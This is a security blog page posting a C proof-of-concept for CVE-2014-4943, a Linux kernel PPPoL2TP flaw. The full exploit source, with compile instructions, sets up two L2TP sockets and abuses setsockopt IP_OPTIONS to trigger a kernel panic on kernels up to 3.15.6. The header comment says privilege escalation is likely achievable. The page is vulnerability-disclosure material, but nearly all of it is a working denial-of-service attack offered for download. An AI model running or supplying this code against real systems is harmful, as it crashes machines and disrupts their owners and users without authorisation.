You are here : Home » Exploits » cve-2014-4943 Linux Kernel D.O.S POC

cve-2014-4943 Linux Kernel D.O.S POC

D 24 February 2015     H 19:06     A Emeric Nasi     C 0 messages


agrandir
  1.  
  2.  
  3. /* ----------------------------------------------------------------------------------------------------
  4.  * cve-2014-4943_poc.c
  5.  *
  6.  * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
  7.  * differences between an l2tp socket and an inet socket.
  8.  *
  9.  * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
  10.  * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
  11.  * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
  12.  * If seems guys at immunuty found a way using race condition.
  13.  *
  14.  *
  15.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c
  16.  *
  17.  * Emeric Nasi - www.sevagas.com
  18.  *-----------------------------------------------------------------------------------------------------*/
  19.  
  20.  
  21.  
  22. /* ----------------------- Includes ----------------------------*/
  23.  
  24. #include <netinet/ip.h>
  25. #include <netinet/in.h>
  26. #include <arpa/inet.h>
  27. #include <netdb.h>
  28. #include <stdio.h>
  29. #include <stdlib.h>
  30. #include <string.h>
  31. #include <unistd.h>
  32. #include <sys/socket.h>
  33. #include <sys/mman.h>
  34. #include <linux/net.h>
  35. #include <linux/udp.h>
  36. #include <linux/if.h>
  37. #include <linux/if_pppox.h>
  38. #include <linux/if_pppol2tp.h>
  39.  
  40.  
  41. /* ----------------------- Definitions ----------------------------*/
  42.  
  43. #define TARGET_KERNEL_MIN "3.2.0"
  44. #define TARGET_KERNEL_MAX "3.15.6"
  45. #define EXPLOIT_NAME "cve-2014-4943"
  46.  
  47.  
  48.  
  49. /* ----------------------- functions ----------------------------*/
  50.  
  51.  
  52. /**
  53.  * It is possible to modify several parts of socket object using IP options frop UDP setsockopt
  54.  * For this POC, IP_OPTIONS is the easiest way to panic kernel
  55.  */
  56. void modifyUDPvalues(int tunnel_fd)
  57. {
  58. /* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
  59.  
  60.  int udp_setsockopt(struct sock *sk, int level, int optname,
  61.   char __user *optval, unsigned int optlen)
  62.  {
  63.   if (level == SOL_UDP || level == SOL_UDPLITE)
  64.   return udp_lib_setsockopt(sk, level, optname, optval, optlen,
  65.   udp_push_pending_frames);
  66.   return ip_setsockopt(sk, level, optname, optval, optlen);
  67.  }
  68. */
  69.  
  70. int ip_options = 0x1;
  71.  
  72. if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1)
  73. {
  74. perror("setsockopt (IP_OPTIONS)");
  75. }
  76. }
  77.  
  78.  
  79. /**
  80.  * DOS poc for cve_2014_4943 vulnerability
  81.  */
  82. int main()
  83. {
  84.  
  85. int tunnel_fd;
  86. int tunnel_fd2;
  87. int udp_fd;
  88.  
  89. printf("[cve_2014_4943]: Preparing to exploit.\n");
  90.  
  91. /* Create first L2TP socket */
  92. tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  93. if (tunnel_fd < 0)
  94. {
  95. perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
  96. return -1;
  97. }
  98. /* Create second L2TP socket */
  99. tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
  100. if (tunnel_fd2 < 0)
  101. {
  102. perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
  103. return -1;
  104. }
  105. if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  106. {
  107. perror("cannot create socket");
  108. return -1;
  109. }
  110.  
  111. /* Connect LT2P socket */
  112. struct sockaddr_pppol2tp sax;
  113.  
  114. memset(&sax, 0, sizeof(sax));
  115. sax.sa_family = AF_PPPOX;
  116. sax.sa_protocol = PX_PROTO_OL2TP;
  117. sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */
  118. sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
  119. sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
  120. sax.pppol2tp.addr.sin_family = AF_INET;
  121. sax.pppol2tp.s_tunnel = 8;//tunnel_id;
  122. sax.pppol2tp.s_session = 0; /* special case: mgmt socket */
  123. sax.pppol2tp.d_tunnel = 0;
  124. sax.pppol2tp.d_session = 0; /* special case: mgmt socket */
  125.  
  126. if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
  127. {
  128. perror("connect failed");
  129. }
  130.  
  131. /* Connect LT2P socket */
  132. struct sockaddr_pppol2tp sax2;
  133. memset(&sax, 0, sizeof(sax2));
  134. sax2.sa_family = AF_PPPOX;
  135. sax2.sa_protocol = PX_PROTO_OL2TP;
  136. sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
  137. sax2.pppol2tp.s_session = 1;
  138. sax2.pppol2tp.d_tunnel = 0;
  139. sax2.pppol2tp.d_session = 1;
  140.  
  141. if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
  142. {
  143. perror("connect failed");
  144. }
  145.  
  146.  
  147. /*
  148.   * Entering critical part
  149.   */
  150. printf("[cve_2014_4943]: Panic!\n");
  151.  
  152. //modifyUDPvalues(tunnel_fd);
  153. modifyUDPvalues(tunnel_fd2);
  154.  
  155. // close opened socket
  156. puts("\n [+] Closing sockets...");
  157. close(tunnel_fd);
  158. close(tunnel_fd2);
  159.  
  160. exit(0);
  161. }

Download

Also in this section

15 December 2016 – TVT DVR/CCTV webshell exploit

11 April 2015 – cve-2014-7822 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-9322 Linux Kernel D.O.S POC

23 February 2015 – cve-2014-3631 Linux Kernel D.O.S POC

Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post